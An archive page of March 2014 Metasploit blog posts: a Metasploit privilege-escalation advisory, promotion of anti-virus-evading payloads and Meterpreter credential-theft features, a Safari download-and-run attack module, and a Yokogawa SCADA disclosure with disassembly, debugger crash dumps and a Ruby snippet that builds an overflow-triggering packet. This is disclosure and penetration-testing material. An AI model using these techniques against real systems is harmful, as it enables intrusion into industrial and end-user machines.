Skip navigation
All Places > Metasploit > Blog > 2014 > March
2014

Metasploit Pro, Community, and Express users are urged to update to the latest version of Metasploit to receive the patch for the described vulnerability. Kali Linux users should use the normal 'apt-get update' method of updating, while other Metasploit Pro, Community, and Express users can use the in-application Administration : Software Updates button.

 

A remote privilege escalation vulnerability has been discovered by Ben Campbell of MWR InfoSecurity and subsequently patched in recent versions of Rapid7's Metasploit Pro, Community, and Express penetration testing software.

 

Vulnerability Details

By providing specially-crafted datastore options to certain Metasploit modules, a remote, authenticated user can leverage a lack of input sanitation to gain privileged access to the underlying operating system on systems running Metasploit 4.8 or prior. The issue was resolved in the Metasploit 4.9.0 release as of commit 460a1f551ca6916dedab6a6788a2aa63f70eaa31. The vulnerable Metasploit modules were:

 

     modules/auxiliary/scanner/http/sqlmap.rb

     modules/post/windows/gather/screen_spy.rb

 

The screen_spy module was updated to no longer allow direct command access to users. The sqlmap module was removed from Metasploit, since Metasploit does not ship a version of sqlmap, and it appears impossible to effectively patch this module given the design of sqlmap.

 

It's important to note that this avenue of attack is only available to users who already have a username and password for the Metasploit Pro, Community, or Express application, or who can run Metasploit locally. In most installations, we've found that these Metasploit users already have root/Administrator access to the machine Metasploit is running on.

 

Affected Versions

All versions of Metasploit prior to 4.9.0 are affected. Metasploit 4.9.0 was released Wednesday, March 26, 2014, and is not affected by the vulnerability.

 

Note that users who are able to run Metasploit with elevated privileges on a local console are already assumed to have those elevated privileges for normal operation. This is the case with the vast majority of Metasploit Community and Express users, and the entire userbase of Metasploit Framework.

 

Workarounds

Best practices for Metasploit Pro users is to take care to only expose the Metasploit UI on trusted interfaces connected to internal networks, and only grant user access to trusted users. Therefore, sensible user and network access policies are an effective workaround for this vulnerability.

 

Users unable to update to 4.9.0 may manually delete the affected modules with no other ill effects (other than the loss of of use of those modules). After locating and deleting the modules, restart Metasploit Pro to clear the module cache. The appropriate paths to these modules are discoverable with a local 'find' or 'search' command, depending on the operating system.

 

Credit

 

R7-2014-05 was first reported by Ben Campbell of MWR InfoSecurity, who worked with Rapid7 to disclose this vulnerability.

 

Disclosure Timeline

 

Feb 15, 2014 (Sun): Initial disclosure from Ben Campbell on sqlmap.rb

Mar 03, 2014 (Mon): Workarounds discussed, screen_spy.rb reported with similar issue

Mar 12, 2014 (Wed): Patch to screen_spy and deletion strategy for sqlmap developed

Mar 25, 2014 (Tue): Fix landed to 4.9.0 final branch

Mar 26, 2014 (Wed): Metasploit 4.9.0 released

Mar 28, 2014 (Fri): Rapid7 disclosure published, release note DOC-2706 updated.

Part of the Metasploit Framework, msfvenom is a command-line tool that helps penetration testers to generate stand-alone payloads to run on compromised machines to get remote access to the system. Msfvenom is a combination of two other Metasploit Framework tools: Msfpayload and Msfencode, which generate and encode payloads respectively.

 

msfvenom.png

Even if you have used Msfvenom before, chances are that you need to look up the tool's documentation every time you want to generate a payload. Msfvenom is a great tool, but getting all of the command line options right can be a challenge. With the new Payload generator, you can generate new payloads for any platform much more quickly:

Classic Payloads.png

 

Encoding the payload is easy, too. Simply type in the characters you'd like to see excluded from the payload.

 

payload-generator-encoding.png

 

You can choose different formats for the output format: EXE, raw bytes, and shellcode buffer.

 

payload-generator-output.png

 

We're making this new productivity feature available to you for free in Metasploit Community until April 30, 2014, after which it will become a Metasploit Pro exclusive feature again. You can get your free copy of Metasploit Community or a free Metasploit Pro trial on the Rapid7 website.

Metasploit 4.9 helps penetration testers evade anti-virus solutions, generate payloads, test network segmentation, and generally increase productivity through updated automation and reporting features. Since version 4.8, Metasploit has added 67 new exploits and 51 auxiliary and post-exploitation modules to both its commercial and open source editions, bringing our total module count up to 1,974. The new version is available immediately.

 

Generate AV-evading Dynamic Payloads

 

Malicious attackers use custom payloads to evade anti-virus solutions. Because traditional Metasploit Framework payloads are open source and well known to AV vendors, they are often quarantined by AV solutions when conducting a penetration test, significantly delaying an engagement or even stopping a successful intrusion, giving the organization a false sense of security. Penetration testers must therefore have the ability to evade AV solutions to simulate realistic attacks.

 

The new Metasploit Pro 4.9 generates Dynamic Payloads that evade detection in more than 90% of cases and has the ability to evade all ten leading anti-virus solutions by creating a unique payload for each engagement that does not demonstrate the typical behavior flagged by heuristic algorithms. Dynamic Payloads significantly increase productivity of a penetration tester by saving many hours of creating custom payloads as well as trial and error to evade detection through encoding and ensure that organizations do not fall prey to a false sense of security.

 

Dynamic Payloads.png

 

With Dynamic Payloads, you’ll have these advantages:

 

  • Evade all leading anti-virus vendors: Dynamic Payloads evade the top 10 AV solutions in more than 90% of cases. No AV vendor detects all MSP payload options!
  • More stable sessions: Dynamic Payloads use error corrections to make sessions more stable than regular MSF sessions
  • IPS Evasion through stage encoding: Stager will encode the traffic when downloading the payload, which can help evade IPS

 

Dynamic payloads are exclusive to Metasploit Pro. To test the new AV evasion, get your free Metasploit Pro trial now.

 

Free Webcast: Evading Anti-Virus Solutions with Dynamic Payloads in Metasploit Pro

 

If you would like to learn more about how Dynamic Payloads are used to evade anti-virus solutions, join us on the free webcast "Evading Anti-Virus Solutions with Dynamic Payloads in Metasploit Pro" with Metasploit engineer David Maloney.

 

 

Easily generate stand-alone payloads with the Payload Generator

 

Penetration testers sometimes need a stand-alone payload to install on a machine they have compromised and want to control. Generating stand-alone payloads with msfvenom in Metasploit Framework is very cumbersome even for the most experienced Framework user. The new Payload Generator makes it very easy to generate Classic Payloads for any platform, architecture, stager, stage, encoding and output format.

 

Classic Payloads.png

 

The Payload Generator with Classic Payloads is available in the free Metasploit Community Edition as well as the commercial editions Metasploit Express and Metasploit Pro. Dynamic Payloads can also be downloaded as stand-alone executables and are exclusive to Metasploit Pro. To test the new payload generator, get your free Metasploit Community license or free Metasploit Pro trial now.

 

Test whether your network segmentation is operational and effective

Network segmentation is a security best practice that can help contain a breach to one part of the network by act of splitting a computer network into subnetworks, the so-called segments.

 

While network segmentation is not required by PCI DSS, it is often used to limit the scope the networking falling under PCI compliance. This can drastically limit the effort and cost of PCI compliance.

 

However, there is plenty of room for error in setting up network segmentation, and many companies learned this the hard way. In an interview with SearchSecurity, Try Leach, CTO of the PCI Security Standards Council said: "In the past, we've seen compromises where organizations thought they were doing the right thing, adequately segmenting off what they deemed to be their CDEs, only to find [the security controls were] never tested appropriately."

 

As a result, PCI version 3.0 added requirement 11.3.4, that requires that you conduct a penetration test to verify that your network segmentation is operational and effective. You need to be compliant by June 30, 2015.

 

Metasploit Pro 4.9 adds a new MetaModule for testing whether network segmentation is operational and effective. The MetaModule requires a target server, e.g. on a laptop, in the target network so that Metasploit Pro can test for open ports between the Metasploit Pro instance and the testing server.

 

Segmentation Testing.png

 

This and other MetaModules are exclusive to Metasploit Pro. To test your network segmentation, get the free Metasploit Pro trial now.


Boost your productivity with new and improved Task Chains

Security assessments contain many repetitive and tedious tasks, and long waiting times in between. This is not only frustrating for you as a penetration tester but also increases the cost of engagements to a level where it’s not feasible to test on a regular basis.

 

In a recent survey with more than 2,000 Metasploit users, Metasploit Pro users said that they save 45% of time compared to using Metasploit Framework. With Metasploit Pro 4.9, we’re increasing your productivity even further.

task-chains1.png

 

Using the new Task Chains’ drag & drop interface, you can create custom workflows, either for running on-demand or on a one-time or repeated schedule. For example, you could schedule a network discovery scan, followed by a single pass of MS08-067 exploitation, looting of credentials and screenshots, and an iterative login with known credentials and looting more credentials to come back to an owned network the next morning. Or you could watch it run while focusing on other tasks.

 

What would you do with the extra time you’ve gained from added productivity? You could conduct more assessments, focus your efforts on tasks that really require your expertise, clean up your inbox, or just get home earlier in the day.

 

Task chains are exclusive to Metasploit Pro. To start creating your custom workflows, get the free Metasploit Pro trial now.

 

This and other MetaModules are exclusive to Metasploit Pro. To test your network segmentation, get the free Metasploit Pro trial now.

 

Enjoy a more powerful Meterpreter payload

 

Since the 4.8 release, we have greatly improved Meterpreter's capabilities and reliability. While we were at it, we overhauled the Windows and POSIX Meterpreter development environment to make it easier to set up for researchers and open source contributors.

 

Exciting new Meterpreter functions include:

 

  • Monitor clipboards: automatically download contents of the target's clipboard, continously for the life of the session
  • Have a two-way video chat with your victim: have a heart-to-heart with your compromised client system, in real time
  • Query ADSI and WMI: enables hardcore Windows Domain hackers to rifle through Active Directory records
  • Access cleartext credentials: snarf in-memory passwords on 32-bit and 64-bit platforms with improved Mimikatz
  • Impersonate in-memory tokens: with the new and improved Incognito extension

 

Test your network with 118 new exploits, auxiliary and post-exploitation modules

 

Metasploit is constantly updating its arsenal of exploits, auxiliary and post-exploitation modules to ensure that you’re testing your network against the latest threats. We believe that sharing vulnerabilities and exploits broadly with the community increases security for everyone, which is why we also make all of our modules available in our free editions Metasploit Framework and Metasploit Community.

 

We’re adding new exploits at a rate of 1.2 per day, and here’s what we’ve added since version 4.8:

 

Exploit modules

 

Auxiliary and post modules

 

Please also note the release notes from this release versus the last weekly update.

 

Get your free Metasploit download or trial on the Rapid7 website now!

Making Beautiful Exploits

 

This week, most of our energy has been spent on making Metasploit modules more beautiful. If you're not aware, we have this long-standing bug, Couple hundred msftidy warnings, which deal mostly with the style and syntax of Metasploit modules. msftidy.rb is a little Ruby script that does some basic sanity checking on new Metasploit modules checking, and hopefully soon, some basic fixing, too. If you plan to commit to Metasploit, I strongly encourage you to see about working this little guy into your pre-commit hooks by using the script pre-commit-hook.rb down in tools/dev land:

 

https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit- hook.rb

 

cinderella-special-edition--20051011020749513-000.jpg

 

Setting this up is pretty easy -- the comment docs explain it best:

 

# To install this script, make this your pre-commit hook your local
# metasploit-framework clone. For example, if you have checked out
# the Metasploit Framework to:
#
# /home/mcfakepants/git/metasploit-framework
#
# then you will copy this script to:
#
# /home/mcfakepants/git/metasploit-framework/.git/hooks/pre-commit
#
# You must mark it executable (chmod +x), and do not name it
# pre-commit.rb (just pre-commit)
#
# If you want to keep up on changes with this hook, just:
#
#  ln -sf <this file> <path to commit hook>

 

That's it! You can now safely commit things to your local feature branch and know that you're not accidentally trying to send us modules that core committers will no doubt bug you about. For a little while, we had msftidy also checking incoming pull requests on Travis-CI, but apparently that's not quite working anymore (still digging into it, probably has to do with commit depth). Soon it'll work again, I promise, so we can auto-fail anything that doesn't pass this minimum bar we've established for acceptability.

 

Yes, this is all a little bit fascist. But it's fascism with a heart, I promise. Beloved Metasploit contributor Chris John Riley mused on msftidy's ways in a tweet about his joy in using msftidy to clean up his code. That sparked a little bit of a back and forth from a few Metasploit graybeards about the particular virtues of msftidy. Of course, I just happen to have this soap box right here, so I may as well use it.

 

For me, as a maintainer of a whole lot of people's code (around 200ish direct contributors), msftidy gives me a way to stave off code rot.  Remember, we're not writing code for computers -- that's the easy part. We spend an awful lot of time writing code for humans, and as it so often happens, one of those humans is yourself, six months in the future, looking at a bug report.

 

So, when some simple patterns are recognized and reused, it makes the business of figuring out bugs, adding functionality, and generally maintaining a library of about 2500 Metasploit modules kind of a reasonable task. Otherwise, we'd be spending all our time trying to figure out tabstops and chasing down shadow datastore options and cleaning out old SVN artifacts over and over and over again, leaving no time left over to do useful work like advance the state of the art of security.

 

To be clear: if you want to write in your own personal idiomatic style, go nuts! I won't stop you. Seriously, there are 1600+ forks of Metasploit. Maybe some of them do things a little differently. Sadly, though, we won't be able to accept your nuggets of awesome in our professional (free) product, so if you want to have your stuff in the most popular Metasploit fork, there are some (honestly, not too hard) basic guidelines to follow.

 

Thanks to William Vu and Christian Mehlmauer for their recent work on making msftidy a better tool for sustainable security development.

 

New Modules

 

This week's release features two new modules, including another bit of browser trickery from Joe Vennix, a Firefox shellcode execution wrapper. It's pretty neat, in that you can upgrade your Firefox javascript shells (detailed in Joe's blog post from January, 2014) to proper Meterpreter shells, all without writing anything to disk. Dang!

 

Exploit modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 7-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Pentester Pete here again. It’s nice to see ya’ll and thanks for coming back.  Have you ever had those times when you’re developing, updating, or when a Metasploit module throws a backtrace on ya, and you’re scratching your head asking yourself, “why me, what’s going on”? Well, I hope this blog will get you through those moments with as little pain as possible. That’s right, in this blog we’ll cry, laugh, and dance our way through debugging Metasploit modules.

 

Disclaimer: As a best practice you should never make changes to your master branch, it’s dangerous. Instead create a different branch for any additions or modifications. See the Metasploit Development Environment Guide for more information. ( https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Deve lopment-Environment)

 

First things first, we’ll need to setup our environment. All the mystical debugging magic happens with a really lobster gem called pry-debugger. What is pry-debugger? Well, pry-debugger “Adds step, next, finish, and continue commands along with breakpoints to Pry using debugger.” At this point you may be asking your self, what is Pry? “Pry is a powerful alternative to the standard IRB shell for Ruby. It features syntax highlighting, a flexible plugin architecture, runtime invocation and source and documentation browsing." (http://pry.github.com/). There aren’t enough electrons available to convey the awesomeness of pry.

 

Why do I think pry-debugger is so jiffy cool? You get the power of Pry with the added benefits of having a debugger. The ability to step though the code and see what’s happening gives me invaluable insight when trying to figure out why #{fill_in_the_blank} is not working.

 

How do I get pry-debugger installed? I’m glad you asked. You can use the gem command as follows: “gem install pry-debugger.” This command will install pry-debugger and any of the gems dependences. Now that we have the gem installed we can get to the nitty-gritty.

 

Edit the Gemfile file at the root of your Metasploit directory. Add the following line “gem “pry-debugger.”

 

Untitled.png

 

Now run bundle. This will rebuild the gem dependencies and include the pry-debugger gem. Voila, you will not need to add a “require pry-debugger” to each file you work with.

 

One thing to note: If you pull from the Metasploit framework repository and there is a change to Gemfile, you will have to re-add gem “pry-debugger” and rerun bundle.

 

Now let the fun begin! Lets pick a module to debug. For our example today I’ll use the owa_login module. This module is found under the modules/auxiliary/scanner/http/ directory.  Let’s say, for some reason an account that should work is failing and we want to see why.  Let’s crack open our favorite editor and look for the function that returns the response to our authentication request. We’ll looky-looky wookie, here on line 183 we see a call to send_request_cgi.

 

send_request_cgi.png

 

This is where we want to start debugging. To enable the debugger we add the line “binding.pry” right before the call as shown in the following example.

 

enable-pry.png

 

Now we save the module and fire up our always-trusty mfsconsole. If you are already in msfconsole and used the edit command to edit the file, you can save the file and type reload to refresh the module.  All righty, simple enough; now let’s start debugging!

 

Configure the modules’ options and run it.  Once the module reaches line 183, it will trigger the pry debugging statement. You should see the following screen indicating that the debugger had been triggered.

 

debugging-enabled.png

 

Now that we are in “debug mode” we have full access to any in-scope variables, constants, and functions that the module would have.  Let’s see what value the pass variable is set to. You simply use the p command and the variable name. The following figure demonstrates this. As shown, the pass variable is currently set to jeffy.

 

password.png

RAD, so now we know how to access the value of a variable, but I want more! Ok ok, so to step into the function you can use the command “step.” This will step you into the function. W00t we are now in the send_reqeust_cgi function. Now say you want to step over a function. This can be accomplished with the next command.

 

stepping.png

 

Now if you’re paying attention to the screenshots, you’re yelling at the screen saying, what used “s” to step.  You are correct. You can setup shortcuts so you don’t have the type the entire command. How to setup these shortcuts can be found here: https://github.com/nixme/pry-debugger#tips.

 

Now that we are in the send_request_cgi function. Let’s see what data is contained within our request. Can anyone guess what command we would use?????? That’s right the p command. To see what the request looks like we issue “p r” and boom, there’s our request data.

 

request-data.png

 

You can use the “continue” command to continue execution of the module.  The next time you’re stuck trying to figure out why something is not working, don’t forget about your buddy, pry-debugger.

 

This concludes our walk on the wild side of debugging Metasploit modules. I hope you enjoyed our brief tour.  May the bits be with you.

 

For more information on pry-debugger see: https://github.com/nixme/pry-debugger

For more information on Pry see http://pryrepl.org/

Running Malicious Code in Safari

The most fun module this week, in my humble opinion, is from Rapid7's own Javascript Dementor, Joe Vennix. Joe wrote up this crafty implementation of a Safari User-Assisted Download and Run Attack, which is not technically a vulnerability or a bug or anything -- it's a feature that ends up being a kind of a huge risk. Here's how it goes:

 

image002.png

The target user is already running some decently recent version of Apple OS X, which means they have the Gatekeeper control installed. Gatekeeper is supposed to "protect your Mac" from "malware and misbehaving apps downloaded from the Internet." It does this by warning the user against downloading apps from untrusted (non-Apple-controlled) sources.

 

Since your target user is all hip and not afraid of these warnings (maybe she's a habitual open source / non-Apple-sourced user of software), clicking "Open" at this point will automatically download and execute the downloaded app, which, in our case, is an OSX payload. In the event the user is more paranoid (but more on that below), that's okay -- the exploit will just ask again. And again. And again. Forever. There is no escaping the "Okay" button.

 

Ta-da, shells! For a silent film produced by the Vennix himself, please see This link or just click on the screenshot over there.

 

Therein lies the rub -- Apple is warning people that all software sourced on the non-blessed Internet is potentially evil, and therefore, every non-blessed download engenders this warning. This disregards the reality that only some (small!) fraction of software from the Internet is actually evil.  As a result, this warning is inevitably going to fall on deaf ears, thanks to the Crying Wolf problem that end-user software is notorious for.

 

This is the same kind of psychological user interface problem that endless warnings about self-signed, mismatched, and out-of-date SSL certificates cause for browsers. Yes, "bad" certs like this are potentially evil. Yes, users should use caution when encountering such certs. However, there's no reasonable course of action to actually behave cautiously. What are you going to do, not visit the website you had your heart set on? Besides, every user's experience with these warnings is that the vast majority of the time, nothing bad actually happens when they click "Ok." This ends up giving people literally years of training that warnings like this are an annoyance at best, and flat out wrong at worst.

 

Point of story, this module takes advantage of a bug in human risk assessment. I don't know where to report these bugs (I don't think CERT/CC is a good place for meatware bugs). In any case, have fun patching against this, vendors and IT shops.

 

I know this opinion on secure software design isn't terribly groundbreaking, but this is still a problem here on the 21st Century Internet. So, while Apple, Microsoft, Google, and the rest can noodle on this for a while longer, feel free to use this module to demonstrate the actual risk of this risky design decision.

 

New Modules

This week's release includes nine new modules, including the three new Yokogawa SCADA modules mentioned in Juan's disclosure on the same and discussed last weekend at RootedCon.  There hasn't been a lot of media pickup on those, but the usual warnings apply: if you're responsible for SCADA/ICS (industrial control systems), please pretty please check to see if you're vulnerable, and regardless of the answer, get those things off the public Internet. Nobody wants their oil and gas pipelines monkeyed with by Anonymous or whomever.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 7-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

On Saturday, March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product. Today, as promised, we're publishing details for three of the vulnerabilities found in the product. For all of you who weren't able to attend RootedCON, we're going just to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

 

Vulnerabilities Summary

 

This report include details for three vulnerabilities found in different services used by the Yokogawa CENTUM CS3000 product in order to provide all its functionality. The vulnerabilities have been found in the version R3.08.50:

 

  • R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow: The "BKCLogSvr.exe" service, started automatically with the system, listens by default on UDP/52302. By sending a specially sequence of packets to UDP/52302 it’s possible to trigger a heap based buffer overflow, after an usage of uninitialized data, which allows to DoS the “BKCLogSvr.exe”, and on last instance, could allow execution of arbitrary code with SYSTEM privileges.
  • R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow: The "BKHOdeq.exe" service, started when running the "FCS / Test Function" listens by default on TCP/20109 and TCP/20171. By sending a specially crafted packet to the port TCP/20171 it’s possible to trigger a stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.
  • R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow: The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKBCopyD.exe” service, started when running the “FCS / Test Function”, listens by default on TCP/20111. By sending a specially crafted packet to the port TCP/20111 it’s possible to trigger a stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.

 

Disclosure Timeline

 

DateDescription
Dec 27, 2013Initial disclosure to the vendor, Yokogawa
Jan 13, 2014Disclosure to CERT/CC
Jan 14, 2014CERT/CC assigns VU#479196 and forwards details to JPCERT
Feb 03, 2014

CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities.

ICS-CERT tracking #: ICS-VU-205881

JPCERT tracking #: JVNVU#98181377, JPECERT#98191377

Mar 07, 2014Yokogawa advisory published (PDF).
Mar 10, 2014Metasploit modules published in Pull Request #3081

Technical Analysis

 

R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow

 

The BKLogSvr service listens on the UDP/52302, where expects packets sending

logs, of no more than 1024 bytes, as can be seen on the next assembly from

libbkclogsvr.dll (IDA notation):

 

.text:61DC1283                push    eax            ; fromlen
.text:61DC1284                mov    eax, s
.text:61DC1289                push    ecx            ; from
.text:61DC128A                push    0              ; flags
.text:61DC128C                lea    edx, [esp+42Ch+buf]
.text:61DC1290                push    400h            ; len - packets including logs of 1024 bytes as much
.text:61DC1295                push    edx            ; buf
.text:61DC1296                push    eax            ; s
.text:61DC1297                mov    [esp+438h+fromlen], 10h
.text:61DC129F                call    recvfrom
















 

There is a log packet sample:

 

"\x96\x00\x00\x00\x00\x00\x00\x00\x48\x41\x53\x00\x00\x00\x00\x00"    #........ HIS.....

"\x00\x00\x00\x00\x00\x00\x00\x00\x4c\x4f\x47\x00\x00\x00\x00\x00"    #........ LOG.....

"\x32\x30\x31\x33\x2f\x31\x31\x2f\x30\x39\x20\x31\x39\x3a\x32\x31"    #2013/11/ 09 19:21

"\x3a\x34\x32\x20\x2b\x30\x31\x3a\x30\x30\x2c\x45\x56\x45\x4e\x54"  #:42 +01: 00,EVENT

"\x2c\x30\x78\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x3c\x42\x4f\x53"    #,0x00000 000,<BOS

"\x53\x56\x43\x3e\x20\x2c\x43\x3a\x5c\x43\x53\x33\x30\x30\x30\x5c"  #SVC> ,C: \CS3000\

"\x50\x52\x4f\x47\x52\x41\x4d\x5c\x42\x4b\x48\x42\x6f\x73\x53\x76"    #PROGRAM\ BKHBosSv

"\x63\x2e\x65\x78\x65\x3a\x42\x6f\x73\x53\x76\x63\x4d\x61\x69\x6e"  #c.exe:Bo sSvcMain

"\x3a\x32\x36\x32\x33\x2c\x22\x73\x74\x61\x74\x75\x73\x20\x3a\x20"  #:2623,"s tatus :

"\x42\x4f\x4f\x54\x22\x22"                                                                   #BOOT".

 

The meaning of the several fields, according to our understanding, is it:

 

OffsetField
0x0Size
0x4Unknown
0x8Source
0x18Level
0x20Message

 

The heap overflow occurs while handling the creation of the path where the log will be stored. The allocation for the memory happens on sub_61DC15A0 (IDA Notation), and it’s a buffer of size 0x1b8:

 

.text:61DC16A7                push    1B8h            ; Size
.text:61DC16AC                call    ds:malloc      ; malloc memory: 0x1b8
















 

When sending two consecutive packets with a long Level field, coalescing both Level and Message fields, an overflow happens after the allocation, in a strcpy style copy, resulting in the next crash:

 

0:005> g
(c24.a6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\CS3000\LIBRARY\libbkclogsvr.dll -
eax=00000344 ebx=01846e48 ecx=000000ae edx=01846f9c esi=023af7a8 edi=01847000
eip=61dc1709 esp=023af708 ebp=0183de48 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
libbkclogsvr!BKCLogSvrLibResume+0x549:
61dc1709 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:004> db esi
023af7a8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
023af7b8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
023af7c8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
023af7d8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
023af7e8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
023af7f8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
023af808 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
023af818 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0:004> db edi
01847000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847070 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:004> db edi - 10
01846ff0 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
01847000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
01847060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:004> !heap -p -a edi
address 01847000 found in
_DPH_HEAP_ROOT @ 17d1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
17d19a4: 1846e48 1b8 - 1846000 2000
7c918f01 ntdll!RtlAllocateHeap+0x00000e64
77c2c3c9 msvcrt!_heap_alloc+0x000000e0
77c2c3e7 msvcrt!_nh_malloc+0x00000013
77c2c42e msvcrt!malloc+0x00000027
61dc16b2 libbkclogsvr!BKCLogSvrLibResume+0x000004f2
















 

At the moment of the overflow, the source of the data points to controlled data from the malformed Level/Message field.

 

But in order to trigger the overflow, two consecutive packets are needed. The explanation is on the stack, and how the function doesn’t take care of a correct initialization of local variables:

 

.text:61DC16E3                lea    edi, [esp+450h+var_440] ; origin for the copy comes from here, uninitialized stack is the root cause of the overflow being exploitable.
.text:61DC16E7                xor    eax, eax
.text:61DC16E9                lea    edx, [ebx+12Ch]
.text:61DC16EF                repne scasb
.text:61DC16F1                not    ecx
.text:61DC16F3                sub    edi, ecx
.text:61DC16F5                push    104h
.text:61DC16FA                mov    eax, ecx
.text:61DC16FC                mov    esi, edi
.text:61DC16FE                shr    ecx, 2
.text:61DC1701                mov    edi, edx
.text:61DC1703                lea    edx, [ebx+154h]
.text:61DC1709                rep movsd              ; overflow happens here
















 

The origin for the copy is a local variable, stored on the stack, which has not been initialized previously. So if malicious data can be stored on the stack, the overflow happens. It’s possible to put malicious data on the stack by sending consecutive malicious packets.

 

As has been already explained, in order to exploit the dangerous strcpy controlled data need to be stored in the stack previously in order to abuse the uninitialized local variables. In order to accomplish it two consecutive, malformed packets, can be sent to the server:

 

    test = [1024].pack("V")            # packet length
    test << "AAAA"                      # Unknown
    test << "SOURCE\x00\x00"            # Source
    test << "\x00" * 8                  # Padding
    test << "B" * (1024 - test.length)  # Level & Message coalesced
















 

When the first packet is processed by the vulnerable function, it is the stack (origin for the dangerous copy):

 

0:005> g

Breakpoint 0 hit

eax=00000000 ebx=005c4008 ecx=ffffffff edx=005c0608 esi=00a9f75d edi=005c41c0

eip=61dc16e3 esp=00a9f70c ebp=00000000 iopl=0 nv up ei ng nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286

libbkclogsvr!BKCLogSvrLibResume+0x523:

61dc16e3 8d7c2410 lea edi,[esp+10h]

0:004> t

eax=00000000 ebx=005c4008 ecx=ffffffff edx=005c0608 esi=00a9f75d edi=00a9f71c

eip=61dc16e7 esp=00a9f70c ebp=00000000 iopl=0 nv up ei ng nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286

libbkclogsvr!BKCLogSvrLibResume+0x527:

61dc16e7 33c0 xor eax,eax

0:004> db edi

00a9f71c 53 4f 55 52 43 45 42 42-42 42 42 42 42 42 00 00 SOURCEBBBBBBBB..

00a9f72c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

00a9f73c 00 04 00 00 41 41 41 41-53 4f 55 52 43 45 00 00 ....AAAASOURCE..

00a9f74c 00 00 00 00 00 00 00 00-42 42 42 42 42 42 42 42 ........BBBBBBBB

00a9f75c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

00a9f76c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

